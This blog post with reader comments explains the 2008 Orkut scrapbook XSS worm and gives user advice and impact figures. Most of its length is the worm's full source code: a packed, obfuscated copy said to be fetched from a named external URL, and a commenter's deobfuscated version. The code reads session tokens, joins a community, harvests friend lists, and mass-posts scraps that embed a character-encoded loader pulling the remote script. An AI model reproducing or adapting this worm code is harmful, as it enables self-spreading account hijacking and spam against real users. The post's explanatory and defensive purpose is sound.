Orkut XSS Attack - "2008 vem ai... que ele comece mto bem para vc" thing
A lot of you have probably been wondering how you received a scrap saying " 2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.
Its called xss attack or cross site scripting attack. A piece of javascript code(on clients side that is your browser) gets executed, when you receive a scrap from your friends id(obviously after his orkut session is infected with the malicious code) with the spam message and started scrapping everyone. This happens when you log into your orkut scrapbook to read the malicious scrap.
When someone sends you a spam scrap and you read that the same scrap is sent to your friends from your account. This will spread for the coming few days possibly till orkut takes some measures.
Steps you can take:
If possible change your gmail account password and do not login to orkut till they sort this out.
Courtesy: Antrix.net(find link in comments)
The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js
function $(p,a,c,k,e,d) {
e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+
(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1)
{h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")
+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7()
{6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0))
;f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();
3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>
[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\'); r.1o=" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|
return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|
wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|S
IG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|
open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400
|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime
|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|
GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild
|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|
raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"
The orkut website is built on asp.net,
if you wish to read the technical side
of preventing xss attacks in asp.net go here
Update:
1.) The problem seems to have sorted out by orkut in
2 days(thats long)
2.) 400,000 users affected.
3.) Top users affected by country
US, Germany, India, Brazil
4.) Orkut has still not accepted it was
a mistake from their side.The official orkut blog
is still mum on the incidence.
5.) Your password is safe, though it was possible
to hack your gmail password if say the virus
redirected to you to a page which looked
exactly like orkut and asked you to relogin.
A
6 comments:
Can we prevent it?Since you have found the cause,you might have a solution as well.Nice analysis though.
More info on this Orkut scrapbook virus thing is here: http://antrix.net/journal/techtalk/orkut_xss.html and in the comments here: http://antrix.net/journal/techtalk/orkut_xss.comments
Here is an unobfuscated version of the script above:
var index=0;
var POST=JSHDF["CGI.POST_TOKEN"];
var SIG=JSHDF["Page.signature.raw"];
function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {};
try {
return new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {};
try {
return new XMLHttpRequest()
} catch (e) {};
return null
}
;
function setCookie(name,value,expires,path,domain,secure) {
var curCookie=name+"="+escape(value)+(expires?"; expires="+expires.toGMTString():"")+(path?"; path="+path:"")+(domain?"; domain="+domain:"")+(secure?"; secure":"");
document.cookie=curCookie
}
;
function getCookie(name) {
var dc=document.cookie;
var prefix=name+"=";
var begin=dc.indexOf("; "+prefix);
if (begin==-1) {
begin=dc.indexOf(prefix);
if (begin!=0) {
return false
}
} else {
begin+=2
}
;
var end=document.cookie.indexOf(";",begin);
if (end==-1) {
end=dc.length
}
;
return unescape(dc.substring(begin+prefix.length,end))
}
;
function deleteCookie(name,path,domain) {
if (getCookie(name)) {
document.cookie=name+"="+(path?"; path="+path:"")+(domain?"; domain="+domain:"")+"; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0)
}
}
;
function loadFriends() {
var xml=createXMLHttpRequest();
if (xml) {
xml.open("GET","http://www.orkut.com/Compose.aspx",true);
xml.send(null);
xml.onreadystatechange=function() {
if (xml.readyState==4) {
if (xml.status==200) {
var xmlr=xml.responseText;
var div=document.createElement("div");
div.innerHTML=xmlr;
var select=div.getElementsByTagName("select").item(0);
if (select) {
select.removeChild(select.getElementsByTagName("option").item(0));
select.setAttribute("id","selectedList");
select.style.display="none";
document.body.appendChild(select);
sendScrap()
}
} else {
loadFriends()
}
}
}
;
xml.send(null)
}
}
;
function cmm_join() {
var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
var xml=createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);
xml.onreadystatechange=function() {
if (xml.readyState==4) {
if (xml.status!=200) {
cmm_join();
return
}
;
loadFriends()
}
}
}
;
function sendScrap() {
if (index==document.getElementById("selectedList").length) {
return
}
;
var scrapText="Boas festas de final de ano!<br/><br/>[silver]"+new Date().getTime()+"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'String.fromCharCode(115, 99, 114, 105, 112, 116, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 102, 105, 108, 101, 115, 46, 109, 121, 111, 112, 101, 114, 97, 46, 99, 111, 109, 47, 118, 100, 111, 111, 114, 107, 117, 116, 47, 102, 105, 108, 101, 115, 47, 118, 105, 114, 117, 115, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41)'\" width=\"1\" height=\"1\"></embed>";
var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;
var xml=createXMLHttpRequest();
xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);
xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange=function() {
if (xml.readyState==4) {
index++;
var wDate=new Date;
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut',index,wDate);
sendScrap()
}
}
}
;
if (!getCookie('wormdoorkut')) {
var wDate=new Date;
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut','0',wDate)
}
;
index=getCookie('wormdoorkut');
cmm_join();
Swadesh you cannot stop a xss attack unless you disable client side scripting like javascript/activex.
The only way to prevent xss attack is to sanitize input data.
Something google shd have taken seriously.
What you do a user is be very careful about where you enter your password. Which means you shoudl only enter your password on orkuts login page and nowhere else specially on site that look like phishing.
If you fear something is not right, close your browser, clear all cookies and files and relogin.
Saw more of this today. Only now, the js url is new. Funny - users actually copy the encoded js into the address bar and run it!
It then decodes and grabs the real js from elsewhere and runs. Its the same wormdoorkut thing. Worm, if we can call it.
ohhhhkkkkk :) thanks for information
Post a Comment